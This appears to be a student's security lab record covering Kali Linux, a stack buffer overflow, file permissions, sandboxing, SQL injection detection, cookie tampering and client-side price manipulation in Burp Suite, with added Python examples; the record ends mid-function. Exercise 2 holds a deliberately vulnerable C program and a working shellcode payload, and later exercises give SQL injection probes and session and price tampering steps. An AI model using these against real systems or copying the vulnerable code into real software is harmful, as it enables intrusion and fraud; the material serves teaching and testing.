Security Whole

EX.NO: 1
STUDY EXPERIMENT OF KALI LINUX
DATE:

AIM:
To study about Kali Linux.
DESCRIPTION:
Kali Linux is a Debian-derived Linux distribution designed for advanced penetration testing,
digital forensics, and security auditing. It is maintained and funded by Offensive Security Ltd.
Kali ships with a large number of tools that support different information security tasks.
Some of these tools are:
• Aircrack-ng
• Burp suite
• Ettercap
• John the Ripper
• Maltego
• Nmap
• OWASP ZAP
• Wireshark
• Hydra
• Reverse Engineering tools
• Foremost
• Volatility
These tools serve a great many purposes, most of them centred on exploiting a target
application or network, carrying out network discovery, and scanning a target IP address.

Installation Procedure of Kali Linux


Now that we have seen how Kali Linux can be useful, let us look at the Installation
steps and procedure for Kali Linux.
Installation Necessities
Installing Kali Linux is a simple and stress-free process. We first need to check that our
computer has compatible hardware. Kali Linux supports the amd64, i386, and ARM platforms.
The i386 images can be run on systems with more than 4GB of RAM.
Installation Prerequisites
• We will require at least 20 GB of disk space to install Kali Linux.
• For systems using the i386 and amd64 architectures we will need at least 1GB of RAM,
but 2GB of RAM or more is recommended.
• Our system will need a CD/DVD drive or support for booting from USB.

Steps to Install Kali Linux


Step 1: Boot Screen
To start the installation, boot the system with either the CD or the USB drive, whichever
installation medium we have chosen. We will be greeted with the Kali Linux boot screen. Here
we can choose either Graphical Install or Text-Mode install. For our example, we will choose
the Graphical install.
HARIHARAN A - 71812201054
Step 2: Select a Language
Select the preferred language on the next screen and click on the Continue button.
Step 3: Select your location
The next step will be specifying our geographic location. We then click on the Continue
button.
Step 4: Configure the Network – Enter Hostname
In this step, the image is copied to our hard disk, our network interfaces are probed, and
then we are prompted to enter a hostname for the system. Click on the continue button after
entering the hostname.
In our example, we have taken “kali” as our hostname.
Step 5: Configure the Network – Enter the Domain Name
Optionally, we can also provide a domain name for our system to be able to use by
default.
Step 6: Setup User Account
In the next step, we will need to provide a username for setting up the user account.
The full name of the user is a reasonable choice for this field.
Step 7: Setup User ID
Based on the username provided in the previous step, a default user ID will be created.
We can change this later from the settings if we like.
Step 8: Configure the Clock
Then, we will set our time zone in this step.
Step 9: Partitioning Method
In this step, the installer reviews and analyses our disks and offers us four choices, as
shown in the screenshot below. For our example, we will be using the entire disk, so we
choose the first option. The second and third options require us to configure LVM (logical
volume manager), and the fourth option, Manual, can be used by experienced users for manual
partitioning, giving them more granular configuration options.
Step 10: Partition Disks
After selecting our Partitioning method, we need to select the disk to be partitioned.
Step 11: Partitioning Scheme
Based on our needs, we can either keep all the directories in a single disk or choose to
have distinct partitions for the directories. If we are not sure about the options, it is safest to go
with the option “All files in one partition”.
Step 12: Review Changes
This is the review page, where we can analyze the options we have selected and check
for one last time if all our configuration changes are correct because once we click on Continue,
the installer will get to work and irreversible changes will be made. Here we will have almost
finished our installation, as the major steps are done.
Step 13: Configure the Package Manager
In this step, we will configure network mirrors and we will need to enter proxy
information if any, as needed.
NOTE: Choosing No on this screen will prevent us from installing packages from the Kali repositories.
Step 14: Install GRUB
In this step, we will be prompted to install GRUB.
Step 15: Kali installation
Finally, the Kali installation is complete. Click on the Continue button to reboot the system
into the new Kali installation.

Basic Kali Linux Commands:
apt-get Search for and install software packages (Debian)
aptitude Search for and install software packages (Debian)
bash GNU Bourne-Again Shell
bg Send to background
cal Display a calendar
cat Concatenate and print (display) the content of files
cd Change Directory
chmod Change access permissions
clear Clear terminal screen
cmp Compare two files
comm Compare two sorted files line by line
cp Copy one or more files to another location
date Display or change the date time
echo Display message on screen
exec Execute a command
exit Exit the shell
file Determine file type
ftp File Transfer Protocol
hash Remember the full pathname of a name argument
head Output the first part of file(s)
help Display help for a built-in command
history Command History
hostname Print or set system name
ifconfig Configure a network interface
ifdown Stop a network interface
ifup Start a network interface up
import Capture an X server screen and save the image to file
install Copy files and set attributes
make Recompile a group of programs
man Help manual
mkdir Create new folder(s)
mv Move or rename files or directories
open Open a file in its default application
op Operator access
passwd Modify a user password
paste Merge lines of files
pathchk Check file name portability
ping Test a network connection
pwd Print Working Directory
ssh Secure Shell client (remote login program)
sudo Execute a command as another user
touch Change file timestamps
vi Text Editor
who Print all usernames currently logged in
whoami Print the current user id and name (`id -un')

Examples:
Command: ls
The command “ls” (List Directory Contents) lists the contents of the directory from which it
runs, whether files or folders. The most common options are -a (all files, including hidden
ones) and -l (long, detailed listing). Tab completion is supported and may be configured with
.inputrc.
When output goes to a file, the entries are listed one per line. By default, colour is not used
to distinguish types of files; this is equivalent to using --color=none. Using the --color option
without the optional WHEN argument is equivalent to --color=always. With --color=auto, colour
codes are output only if standard output is connected to a terminal (tty).
Command: lsblk
The “lsblk” command (List Block Devices) prints block devices by their assigned name (but
not RAM) on the standard output in a tree-like fashion.
The “lsblk -l” command lists block devices in list form rather than as a tree. Note: lsblk is
a very useful and easy way to learn the name of a USB device you have just plugged in,
especially when you have to deal with disks/block devices in the terminal.
Command: sudo
The “sudo” (super user do) command allows a permitted user to execute a command as
the superuser or another user, as specified by the security policy in the sudoers file.
Example: root@Kali:~# sudo add-apt-repository ppa:tualatrix/ppa
Note: sudo lets a user borrow superuser privileges for one command, while the similar
command “su” lets the user actually log in as the superuser. sudo is safer than su. It is not
advised to use sudo or su for day-to-day normal use, as an accidental mistake can cause serious
damage; that is why a very popular saying in the Linux community is: “To err is human, but to
really foul up everything, you need the root password.”
Command: mkdir
The “mkdir” (Make directory) command creates a new directory with the given name or
path. If the directory already exists, it returns an error message saying that the directory cannot
be created because it already exists.
Example: root@Kalitut:~# mkdir Kalitut
Note: A directory can only be created inside a folder in which the user has write permission.
mkdir: cannot create directory 'Kalitut': File exists
(Do not be confused by the word “file” in the above output; as noted at the beginning, in
Linux every file, folder, drive, command and script is treated as a file.)
Command: chmod
The Linux “chmod” command stands for (change file mode bits). chmod changes the
file mode (permissions) of each given file, folder, script, etc. according to the mode asked for.
There are three types of permission on a file (or folder or anything else, but to keep things
simple we will use a file):
Read (r) = 4
Write (w) = 2
Execute (x) = 1
So to give only read permission on a file, the value 4 is assigned; for write permission only,
the value 2; and for execute permission only, the value 1. For read and write permission,
4+2 = 6 is given, and so on.
Permissions need to be set for three kinds of user: first the owner, then the group and
finally the world (everyone else).
rwxr-x--x abc.sh
Here the owner's (root's) permission is rwx (read, write and execute).
The group to which the file belongs has r-x (read and execute only, no write permission), and
the world has --x (execute only).

To change its permissions and provide read, write and execute permission to owner, group and
world:
root@Kali:~# chmod 777 abc.sh
Only read and write permission to all three:
root@Kalitut:~# chmod 666 abc.sh
Read, write and execute to the owner and only execute to group and world:
root@Kalitut:~# chmod 711 abc.sh
Note: This is one of the most important commands for sysadmins and users alike. On a
multi-user system or on a server this command comes to the rescue; setting the wrong
permissions will either make a file inaccessible or give unauthorised access to someone.
Command: tar
The “tar” (Tape Archive) command is used to create archives in a number of file formats
and to extract them.
root@Kali:~# tar -zxvf abc.tar.gz      (remember 'z' for .tar.gz)
root@Kali:~# tar -jxvf abc.tar.bz2     (remember 'j' for .tar.bz2)
root@Kali:~# tar -czvf archive.tar.gz /path/to/folder/abc      (create a gzipped archive)
root@Kali:~# tar -cjvf archive.tar.bz2 /path/to/folder/abc     (create a bzip2 archive)
Note: “tar.gz” means gzipped. “tar.bz2” is compressed with bzip2, which uses a better but
slower compression method.
Command: cp
The “cp” command (Copy) copies a file from one location to another.
root@Kali:~# cp /home/user/Downloads/abc.tar.gz /home/user/Desktop     (returns 0 on success)
Note: cp is one of the most commonly used commands in shell scripting, and it can be used
with wildcard characters for customised file copying.
Command: mv
The “mv” command moves a file from one location to another.
root@Kali:~# mv /home/user/Downloads/abc.tar.gz /home/user/Desktop     (returns 0 on success)
Note: mv can be used with wildcard characters. mv should be used with caution, as moving
system files or files you are not authorised to touch may lead to security problems as well as
breakdown of the system.
Command: pwd
The “pwd” command (print working directory) prints the current working directory with
its full path name in the terminal.
root@Kali:~# pwd
/home/user/Desktop
Note: This command will not be used very frequently in scripting, but it is an absolute life
saver for a newbie who gets lost in the terminal in their early days with nux (Linux is
commonly referred to as nux or nix).
Command: cd
Finally, the frequently used “cd” command (change directory) changes the working
directory so we can execute, copy, move, write, read, etc. from the terminal itself.
root@Kali:~# cd /home/user/Desktop
server@localhost:~$ pwd
/home/user/Desktop
Note: cd comes to the rescue when switching between directories from the terminal. “cd ~”
changes the working directory to the user's home directory and is very useful if a user finds
himself lost in the terminal. “cd ..” changes the working directory to the parent of the current
working directory.
RESULT:
Thus, the study on Kali Linux has been completed successfully.

EX.NO: 2
CONTROL HIJACKING ATTACKS: EXPLOITS AND
DEFENSES
DATE:

AIM:
To trigger and exploit a buffer overflow attack against a custom C program.
PROCEDURE:
Step 1:
Create a shell file envexec.sh
nano envexec.sh
Step 2:
Give execution privilege to the shell file created.
chmod +x envexec.sh
Step 3:
Create the vulnerable C file.
nano vuln.c
Step 4:
Compile the code with the following command
gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g vuln.c -o vuln
Step 5:
Clean the environment and execute the exploit
./envexec.sh /root/vuln $(python ...)
Step 6:
Run GDB to load a program to analyse
(gdb)run vuln.c
Step 7:
Display the debugging symbols.
list
list main    (the function of the vulnerable code)
Step 8:
Display the assembly code
disas main
Step 9:
To examine the information of the program
info os
info functions
info variables
Step 10:
Run the program with input.
run Hello (any preferred string)
Step 11:
Run the overflow to display segmentation fault
run $(python -c 'print "\x41" * 508')
Step 12:
Examine the memory address
x/200x $esp-550    (use $rsp instead of $esp on a 64-bit target)

Step 13:
Confirm overwrite of the basepointer register.
info registers
Step 14:
Run the exploit
run $(python -c 'print "\x90" * 425 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\xba\xfa\xff\xbf" * 10')

Step 15:
Confirm execution of exploit by checking basepointer register.
info registers

A shellcode is a small piece of code used as the payload in the exploitation of a software
vulnerability. It is called "shellcode" because it typically starts a command shell from which
the attacker can control the compromised machine, but any piece of code that performs a
similar task can be called shellcode.

envexec.sh
#!/bin/sh
# Run a program (optionally under gdb) with an emptied, controlled environment, so that
# stack addresses stay stable between runs inside and outside the debugger.
while getopts "dte:h?" opt ; do
    case "$opt" in
        h|\?)
            printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
            exit 0
            ;;
        t)
            tty=1
            gdb=1
            ;;
        d)
            gdb=1
            ;;
        e)
            env=$OPTARG
            ;;
    esac
done
shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)        # absolute path of the program to run
shift
if [ -n "$gdb" ] ; then
    if [ -n "$tty" ]; then
        touch /tmp/gdb-debug-pty
        exec env - $env TERM=screen PWD=$PWD gdb -tty /tmp/gdb-debug-pty --args $prog "$@"
    else
        exec env - $env TERM=screen PWD=$PWD gdb --args $prog "$@"
    fi
else
    exec env - $env TERM=screen PWD=$PWD $prog "$@"
fi

Vulnerable Code [vuln.c]

#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable: strcpy copies argv[1] into a fixed 500-byte stack buffer
   with no length check, so a longer argument overwrites the saved frame pointer and
   the return address (the behaviour Steps 11-15 rely on). */
int main (int argc, char** argv)
{
    char buffer[500];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <input>\n", argv[0]);
        return 1;
    }
    strcpy(buffer, argv[1]);
    return 0;
}

OUTPUT:

RESULT:
Thus, the implementation to trigger and exploit a buffer overflow attack against C
program has been completed and executed successfully.

EX.NO: 3
PRINCIPLES OF LEAST PRIVILEGE, ACCESS CONTROL,
AND OPERATING SYSTEM SECURITY
DATE:

AIM:
To work with kali linux commands regarding the users and the privileges
PROCEDURE:

In a long directory listing, a dash at the start of the line means that the entry is a file, and a
d at the start means that it is a directory.

The letters r, w and x mean read, write and execute; they are the permission settings that a
particular group of users has.

There are three groups. The first group is the owner of the file, and in the figure above
the owner has full read/write/execute. The next set of three is the permissions for members of
the group that owns the file; this is group ownership as opposed to the actual ownership. The
people in that group can only read and execute the file but cannot write to it. The last set is for
all other users, so any ordinary user can only read and execute it and cannot write to it.
This is important when we get into penetration testing, because we are looking for full
access rights, so we look for folders that have full read/write for all three groups.

Typically, we look at the /tmp folder a lot. As in the figure above, the temp folder
has full read/write/execute. So when we are performing penetration testing and want to
upload some sort of exploit, we might upload it into the temp folder, because in the temp
folder we can execute those files. However, we could also be looking for other files with full
read/write/execute permission that we could modify to gain root access to a system. It is all
about insecure configurations.
Take note: in the permission field of /tmp the last character is a t instead of an x.
If the sticky bit is set on a directory, write permission on the directory is no longer
enough to allow files to be removed. You must additionally own the file or own the
directory to perform such an action. The “t” symbol means that the execute permission (x) is
combined with the sticky bit.

In the /tmp directory above, anyone can create new files. But because of the sticky bit,
one user cannot delete another user's files. Root, however, can still delete from any directory
regardless of permissions.
Another important feature is changing the access of files, folders and directories with the
command chmod.
If we create a script, it will not be able to run until it has execute permission. So how do we
change access in the terminal?

Here, another file is made with the echo command. I will just make the hello.txt file with
the word “hello” in it. When we list the directory contents, the file by default only has
read/write for the owner and read for everybody else.

We can change the access with the command chmod. For instance, in the figure above,
chmod +x hello.txt adds the execute permission for all groups. Now you will notice that
hello.txt is shown in green, the colour ls uses for files that carry the execute bit.

Another way of changing access is with the numeric form. The one number that you
really need to know is all sevens (777), which gives full read/write/execute to everyone. So
this is basically how we change file permissions. You don't need to know the other numbers
for penetration testing; however, when it comes to configuration and secure management of
files, you will probably need to know more about them.
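The following Python is an added example, not part of the original lab record, covering the chmod arithmetic from Exercise 1 together with the permission listing, chmod +x and sticky-bit discussion above. It converts between ls-style permission strings and octal modes, applies them with os.chmod in a scratch directory that stands in for /tmp, and reads back what the kernel stored. The file name abc.sh and the scratch directory are constructed for the demo.

```python
import os
import stat
import tempfile

# Bit weights from the lab: r=4, w=2, x=1, one triplet each for owner, group and world.
WEIGHTS = {"r": 4, "w": 2, "x": 1}


def symbolic_to_octal(perms):
    """Convert a 9-character ls-style string such as 'rwxr-x--x' to a mode (0o751).

    A 't' or 'T' in the last slot sets the sticky bit (0o1000); lower-case 't' also
    keeps the world execute bit, upper-case 'T' means sticky without execute.
    """
    if len(perms) != 9:
        raise ValueError("expected 9 permission characters, got %r" % perms)
    mode = 0
    for i, ch in enumerate(perms):
        triplet = 2 - i // 3          # 2 = owner, 1 = group, 0 = world
        slot = "rwx"[i % 3]
        if ch == "-":
            continue
        if ch in "tT" and triplet == 0 and slot == "x":
            mode |= stat.S_ISVTX
            if ch == "t":
                mode |= 1
            continue
        if ch != slot:
            raise ValueError("unexpected %r at position %d" % (ch, i))
        mode |= WEIGHTS[ch] << (3 * triplet)
    return mode


def octal_to_symbolic(mode):
    """Render the permission bits of a mode the way ls -l prints them."""
    out = []
    for triplet in (2, 1, 0):
        bits = (mode >> (3 * triplet)) & 0o7
        out.append("r" if bits & 4 else "-")
        out.append("w" if bits & 2 else "-")
        executable = bool(bits & 1)
        if triplet == 0 and mode & stat.S_ISVTX:
            out.append("t" if executable else "T")   # sticky bit is shown in the world slot
        else:
            out.append("x" if executable else "-")
    return "".join(out)


def apply_and_read_back(path, mode):
    """chmod the path and return the permission bits the kernel actually stored."""
    os.chmod(path, mode)
    return stat.S_IMODE(os.stat(path).st_mode)


def demo():
    """Reproduce the lab's chmod examples and the /tmp sticky bit in a scratch directory."""
    results = {}
    with tempfile.TemporaryDirectory() as scratch:
        script = os.path.join(scratch, "abc.sh")          # constructed sample file
        with open(script, "w") as f:
            f.write("#!/bin/sh\necho hello\n")
        for label, mode in (("751", symbolic_to_octal("rwxr-x--x")),
                            ("777", 0o777), ("666", 0o666), ("711", 0o711)):
            results["abc.sh " + label] = octal_to_symbolic(apply_and_read_back(script, mode))
        shared = os.path.join(scratch, "shared")          # stands in for /tmp
        os.mkdir(shared)
        results["shared 1777"] = octal_to_symbolic(apply_and_read_back(shared, 0o1777))
        results["shared is_sticky"] = bool(os.stat(shared).st_mode & stat.S_ISVTX)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Reading the mode back with os.stat rather than trusting the value passed to chmod is the habit worth keeping: it is the same check an auditor runs over /tmp or a world-writable script, and it is how the 't' in the listing is actually derived.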
Another feature is adding a new user with the command adduser.

We can add a user with the command sudo adduser followed by the name, and then enter all
the other information. Now we have a user named john. How do we confirm that?

We can confirm it by looking into the /etc/passwd file with the cat command. At the very
bottom you can see the user john, which we just created. This file lists all the users. It no
longer contains the password hashes, although it did a long time ago; the passwords are now in
the shadow file.

In this file you have all this information, and the passwords are stored in hashed form. For
instance, we can use a tool like hashcat to attempt to crack the passwords, depending on your
capability and the strength of the password.
Another feature is switching user with the command su.

We can switch to user john with the command su, and the password for user john is needed
to switch successfully. The command whoami is used to check which user the terminal is
running as, or you can simply look at the prompt john@kali.

User john is not able to perform such an action because he is not user kali.
Another feature is sudo, for escalating privileges.

sudo will give john the access to modify password information for other users if we grant it
to him. This is controlled by the sudoers file; basically, anyone in the sudoers file can change
permissions as granted there. If they are a sudo user in the sudoers file, then they will be able
to change the password. In the figure above, john is not in the sudoers file, so he cannot
perform this action.

In the figure above, kali is in the sudoers file, so that user is allowed to change the password
for john. Therefore, if you want a user other than root/kali to have these permissions, you need
to have them in the sudoers file. That is also useful in penetration testing, because you can
look at the sudoers file, if you have access, and see which users have sudo privileges.
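As an added example (not part of the original record), the following Python joins the four files discussed above, /etc/passwd, /etc/shadow, /etc/group and /etc/sudoers, into one per-user view: which accounts can log in, which hash scheme protects each password, and who holds sudo rights either directly or through the sudo group. All sample lines are constructed; the hashes and salts are placeholders, not real password material, and the sudoers parser handles only plain user and %group lines.

```python
# Constructed sample lines in the formats of /etc/passwd, /etc/shadow, /etc/group and
# /etc/sudoers. Hashes and salts are placeholders, not real password material.
PASSWD = """\
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
kali:x:1000:1000:Kali,,,:/home/kali:/usr/bin/zsh
john:x:1001:1001:John,,,:/home/john:/bin/bash
legacy:x:1002:1002:Old account,,,:/home/legacy:/bin/bash
"""

SHADOW = """\
root:!:19400:0:99999:7:::
daemon:*:19400:0:99999:7:::
kali:$y$j9T$PLACEHOLDERSALT$PLACEHOLDERHASHPLACEHOLDERHASHPLACEHOLDERHASH:19400:0:99999:7:::
john:$6$PLACEHOLDER$PLACEHOLDERHASHPLACEHOLDERHASHPLACEHOLDERHASHPLACEHOLDER:19400:0:99999:7:::
legacy:$1$PLACEHOL$PLACEHOLDERHASHPLACEHO:19400:0:99999:7:::
"""

GROUP = """\
sudo:x:27:kali
"""

SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
john    ALL=(ALL) NOPASSWD: /usr/bin/passwd
"""

# Prefixes of the crypt(3) schemes found in the shadow password field.
HASH_SCHEMES = {"$1$": "md5crypt (weak, fast to crack)", "$5$": "sha256crypt",
                "$6$": "sha512crypt", "$y$": "yescrypt"}


def parse_passwd(text):
    """Map user name -> {uid, shell, interactive}."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, _gid, _gecos, _home, shell = line.split(":")
        users[name] = {"uid": int(uid), "shell": shell,
                       "interactive": not shell.endswith(("/nologin", "/false"))}
    return users


def classify_password_field(field):
    """Describe a shadow password field: empty, locked, or which hash scheme."""
    if field == "":
        return "EMPTY (login without a password)"
    if field.startswith(("!", "*")):
        return "locked"
    for prefix, description in HASH_SCHEMES.items():
        if field.startswith(prefix):
            return description
    return "unknown scheme"


def parse_shadow(text):
    """Map user name -> classification of the password field."""
    out = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, field, _rest = line.split(":", 2)
            out[name] = classify_password_field(field)
    return out


def parse_group(text):
    """Map group name -> list of member user names."""
    out = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, _pw, _gid, members = line.split(":")
            out[name] = [m for m in members.split(",") if m]
    return out


def parse_sudoers(text, groups):
    """Map user name -> sudoers specifications that apply to that user (plain and %group lines only)."""
    grants = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        who, spec = line.split(None, 1)
        principals = groups.get(who[1:], []) if who.startswith("%") else [who]
        for user in principals:
            grants.setdefault(user, []).append(spec)
    return grants


def audit():
    """Join the four files into one per-user view a defender can review."""
    users = parse_passwd(PASSWD)
    shadow = parse_shadow(SHADOW)
    sudo = parse_sudoers(SUDOERS, parse_group(GROUP))
    report = {}
    for name, info in users.items():
        specs = sudo.get(name, [])
        report[name] = {
            "uid": info["uid"],
            "interactive": info["interactive"],
            "password": shadow.get(name, "no shadow entry"),
            "sudo": specs,
            "full_sudo": any(spec.endswith(" ALL") for spec in specs),   # unrestricted command set
        }
    return report


if __name__ == "__main__":
    for name, entry in audit().items():
        print(name, entry)
```

The report flags the two things the text points at: a legacy md5crypt hash (the kind hashcat gets through fastest) and a NOPASSWD grant on /usr/bin/passwd, which is exactly the "change another user's password" capability the sudoers discussion describes.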

RESULT:
Thus, the Kali Linux commands regarding users and privileges used for penetration
testing were successfully studied and executed.

EX.NO: 4
ISOLATION AND SANDBOXING
SANDBOXING THE SYSTEM USING THE SANDBOX TOOL
DATE:

AIM:
To implement isolation and sandboxing using the windows sandbox tool.
PROCEDURE:
Step 1: Go to control panel

Step 2: Open programs to enable sandbox in windows

Step 3: From that, go to programs and features

Step 4: Click on turn windows features on or off

Step 5: Make sure Windows Sandbox is enabled

Step 6: Restart the PC to apply the changes

Step 7: Search for Windows Sandbox in the search bar; there you will find the Windows Sandbox app

Step 8: Right-click on the desktop and select the Paste option to transfer the executable to do a
test in sandbox.

Step 9: Double-click the installer (.exe) to start the installation

Steps 8 and 9 are used for testing a piece of software or any potentially malicious file in an
isolated container (sandbox).
Step 10: After you are done testing the application, click the X button in the top-right corner,
and click the OK button to close Sandbox. As you end the session, the virtual machine and its
contents are erased from your device permanently without affecting your main device, i.e. the
one you use daily.

This is how the sandbox plays a vital role in keeping malicious files, trojans, worms, etc. away from the host.
Affected System:

Here, I created a trojan and it affected the main system

RESULT:
When using the sandbox, the data is erased even if the sandboxed system is affected by a
virus. The advantage is that it keeps your admin system free of malicious apps or software.
The sandbox isolates itself from the admin system.

EX.NO: 5
WEB APPLICATION SECURITY
DETECTION OF SQL INJECTION VULNERABILITY
DATE:

AIM:
To detect SQL injection vulnerabilities using Burp Suite’s web vulnerability scanner.
PROCEDURE: Detecting SQL injection vulnerabilities
The majority of SQL injection vulnerabilities can be found quickly and reliably using
Burp Suite's web vulnerability scanner.
SQL injection can be detected manually by using a systematic set of tests against every entry
point in the application. This typically involves:
• Submitting the single quote character ' and looking for errors or other anomalies.
• Submitting some SQL-specific syntax that evaluates to the base (original) value of the
entry point, and to a different value, and looking for systematic differences in the
resulting application responses.
• Submitting Boolean conditions such as OR 1=1 and OR 1=2, and looking for
differences in the application's responses.
• Submitting payloads designed to trigger time delays when executed within an SQL
query, and looking for differences in the time taken to respond.
• Submitting OAST payloads designed to trigger an out-of-band network interaction
when executed within an SQL query, and monitoring for any resulting interactions.
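As an added example (not from the original record and not Burp Suite's code), the following Python models the single-quote and Boolean-condition checks listed above against two versions of a product lookup: one that concatenates the entry-point value into the SQL text and one that uses a parameterised query. The SQLite catalogue, the product names and the `released` column are constructed for the demo.

```python
import sqlite3


# Constructed product catalogue standing in for the tested application's database;
# the unreleased "Secret prototype" row shows what a successful injection exposes.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (name TEXT, category TEXT, released INTEGER)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?)", [
        ("Mug", "Gifts", 1), ("Pen", "Gifts", 1),
        ("Laptop", "Tech", 1), ("Secret prototype", "Tech", 0),
    ])
    return db


def vulnerable_lookup(db, category):
    """The category value is pasted into the SQL text, so it can change the query."""
    query = "SELECT name FROM products WHERE category = '%s' AND released = 1" % category
    return sorted(row[0] for row in db.execute(query))


def safe_lookup(db, category):
    """Parameterised query: the value is bound as data and can never alter the structure."""
    query = "SELECT name FROM products WHERE category = ? AND released = 1"
    return sorted(row[0] for row in db.execute(query, (category,)))


def send(handler, db, value):
    """Model one request to the entry point; a database error is a distinct response."""
    try:
        return ("ok", handler(db, value))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)


def probe_entry_point(handler, base="Gifts"):
    """Run the single-quote and Boolean-condition checks from the procedure and report which fired."""
    db = make_db()
    quote = send(handler, db, base + "'")
    true_case = send(handler, db, base + "' OR 1=1--")
    false_case = send(handler, db, base + "' OR 1=2--")
    findings = {
        "single_quote_error": quote[0] == "error",
        "boolean_difference": true_case != false_case,
    }
    findings["suspected_injection"] = any(findings.values())
    return findings


if __name__ == "__main__":
    print("vulnerable:", probe_entry_point(vulnerable_lookup))
    print("safe:      ", probe_entry_point(safe_lookup))
```

Against the concatenating handler the stray quote produces a database error and the two Boolean conditions return different product lists (the 1=1 case even leaks the unreleased row, because the comment marker cuts off the `released = 1` filter). Against the parameterised handler all three probes are just unusual category names that match nothing, so the responses are identical and no finding fires; that is the systematic difference the scanner looks for.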
Screenshots:
Vulnerability Site

Non-Vulnerability Site

RESULT:
Thus, detecting SQL injection vulnerabilities was successfully executed and verified.

EX.NO: 6
WEB SESSION MANAGEMENT
USING BURP SUITE TO HACK COOKIES AND
MANIPULATE SESSIONS
DATE:

AIM:
To perform hacking of cookies and manipulate sessions for web session management.
PROCEDURE:
Step 1: First, ensure that Burp is correctly configured with your browser.
Step 2: With intercept turned off in the Proxy "Intercept" tab, visit the login page of the
application you are testing in your browser.

Step 3: Log in to the application you are testing. You can log in using the credentials user:user.

Step 4: Return to Burp. In the Proxy "Intercept" tab, ensure "Intercept is on".

Step 5: Refresh the page in your browser. The request will be captured by Burp, it can be
viewed in the Proxy "Intercept" tab. Cookies can be viewed in the cookie header.

Step 7: We now need to investigate and edit each individual cookie. Right click anywhere on
the request and click "Send to Repeater".
Note: You can also send requests to Repeater via the context menu in any location where HTTP
requests are shown, such as the site map or Proxy history.

Step 8: Go to the Repeater tab. The cookies in the request can be edited easily in the "Params"
tab.

Step 9: By removing cookies from the request we can ascertain the function of each cookie.
In this example, if the "username", "uid" and "PHPSESSID" cookies are removed, the session
is ended and the user is logged out of the application.
We can use the Repeater to remove cookies and test the response from the server.
Remove and add cookies using the "Add" and "Remove" buttons and use the "Go" button to
forward requests to the server.

Step 10: Cookies can be edited in the Request "Params" table. In this example we have altered
the value of the "uid" cookie to 1. Alter the value then click the "Go" button.

Step 11: The response from the server can be viewed in the "Response" panel in Repeater. The
response shows that by altering the "uid" cookie we have logged in to the application as
"admin".

RESULT:
Thus, we have used cookies to manipulate the session and access another account
with elevated privileges.

EX.NO: 7
HTTPS: GOALS AND PITFALLS
MODIFYING HTTP REQUEST WITH BURP SUITE
DATE:

AIM:
To perform hacking of cookies and manipulate sessions for web session management.
PROCEDURE:
Step 1: Access the vulnerable website in Burp's browser. In Burp, go to the Proxy > Intercept
tab and make sure interception is switched off. Launch Burp's browser and use it to visit the
following URL:
https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-excessive-trust-in-client-side-controls
When the page loads, click Access the lab. If prompted, log in to your portswigger.net account.
After a few seconds, you will see your own instance of a fake shopping website.

Step 2: Log in to your shopping account


On the shopping website, click My account and log in using the following credentials:
Username: wiener
Password: peter
Notice that you have just $100 of store credit.
Step 3: Find something to buy Click Home to go back to the home page. Select the option to
view the product details for the Lightweight "l33t" leather jacket.
Step 4: Study the add to cart function. In Burp, go to the Proxy > Intercept tab and switch
interception on. In the browser, add the leather jacket to your cart to intercept the resulting
POST /cart request.

Note: You may initially see a different request on the Proxy > Intercept tab if the browser is
doing something else in the background. In this case, just click Forward until you see the POST
/cart request as shown in the screenshot above.
Study the intercepted request and notice that there is a parameter in the body called price, which
matches the price of the item in cents.
Step 5: Modify the request. Change the value of the price parameter to 1 and click Forward to
send the modified request to the server.

Switch interception off again so that any subsequent requests can pass through Burp Proxy
uninterrupted.
Step 6: Exploit the vulnerability. In Burp's browser, click the basket icon in the upper-right
corner to view your cart. Notice that the jacket has been added for just one cent.
Note: There is no way to modify the price via the web interface. You were only able to make
this change thanks to Burp Proxy. Click the Place order button to purchase the jacket for an
extremely reasonable price.
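As an added example (not part of the original record, and not the lab application's own code), the following Python shows the server-side difference that decides whether the modified request above works: a cart handler that takes the price from the POST body beside one that takes it from the catalogue, plus a detection hook that logs any client-supplied price disagreeing with the catalogue. The product ids, the jacket's price in cents and the $100 store credit are constructed for the demo; the lab does not state the jacket's price.

```python
# Constructed catalogue: product id -> (name, price in cents). The jacket's price is an
# assumption for the demo; the lab does not state it.
CATALOG = {1: ('Lightweight "l33t" leather jacket', 133700), 2: ("Mug", 1299)}
STORE_CREDIT_CENTS = 10000     # the $100 of store credit mentioned in Step 2


def vulnerable_add_to_cart(cart, form):
    """Adds the item at whatever price the client's POST /cart body claims."""
    cart.append({"productId": int(form["productId"]), "price": int(form["price"])})
    return cart


def safe_add_to_cart(cart, form):
    """Takes the price from the catalogue; the body is trusted only for the product id."""
    product_id = int(form["productId"])
    if product_id not in CATALOG:
        raise ValueError("unknown product %d" % product_id)
    _name, price = CATALOG[product_id]
    cart.append({"productId": product_id, "price": price})
    return cart


def price_tampering_alert(form):
    """Detection hook: a client price that disagrees with the catalogue is worth logging."""
    product_id = int(form["productId"])
    claimed = form.get("price")
    if product_id not in CATALOG or claimed is None:
        return None
    actual = CATALOG[product_id][1]
    if int(claimed) != actual:
        return "price mismatch for product %d: client sent %s, catalogue says %d" % (
            product_id, claimed, actual)
    return None


def cart_total(cart):
    return sum(item["price"] for item in cart)


def can_place_order(cart):
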